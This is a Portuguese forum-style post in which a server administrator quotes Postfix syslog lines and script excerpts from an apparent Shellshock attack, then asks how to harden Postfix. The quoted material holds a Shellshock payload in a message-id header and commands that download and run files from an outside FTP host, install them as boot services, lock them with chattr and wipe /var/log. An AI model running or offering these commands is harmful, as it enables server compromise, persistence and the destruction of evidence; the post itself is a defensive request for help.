Ontem recebi um email {@DOMAIN.ORG enviado do meu servidor de email que o email foi marcado como spam.
O corpo incluiu comandos de download de scripts, como ftp://ftp.ugotownedz.org/upfile2.sh
linhas do syslog
Aug 14 19:25:00 hoeschen-vserv postfix/smtpd[20965]: connect from pacific1392.us.unmetered.com[209.239.123.82]
Aug 14 19:25:01 hoeschen-vserv postfix/smtpd[20965]: 25B9ADC1075: client=pacific1392.us.unmetered.com[209.239.123.82]
Aug 14 19:25:02 hoeschen-vserv postfix/cleanup[20969]: 25B9ADC1075: message-id=() { :; }; /bin/bash -c "mkdir /var/.udp; wget ftp://ftp.ugotownedz.org/Xorg -O ... -rf /root/.bash_history; rm -rf /var/log/*"
Na verdade, este shell script muito simples e não criptografado tenta estabelecer um trojan. Para mim, parece um pouco sujo e não teve sucesso.
Mas de qualquer forma, há algo que eu possa fazer para proteger o postfix contra esses tipos de hacks?
Do script
...
echo sshdo.ico >> /tmp/upfile
for file in $(cat /tmp/upfile); do killall $file; ls /tmp/.udp/$file || wget ftp://$1/$file -O /tmp/.udp/$file; chmod +x /tmp/.udp/$file; /tmp/.udp/$file; perl /tmp/.udp/Xorg; perl /tmp/.udp/crun.d ; php /tmp/.udp/sshdo.ico; php sshdo.ico; rm -rf /tmp/.udp/sshdo.ico /tmp/.udp/crun.d /tmp/.udp/Xorg ; done
...
for file6 in $(cat /tmp/upfile); do cp /tmp/.udp/$file6 /etc/init.d/$file6;cp /tmp/.udp/$file6 /etc/init.d/$file6; chmod +x /etc/init.d/$file6; sudo update-rc.d $file6 defaults ; done
...
chattr +i /tmp/.udp/*
rm -rf /var/log/*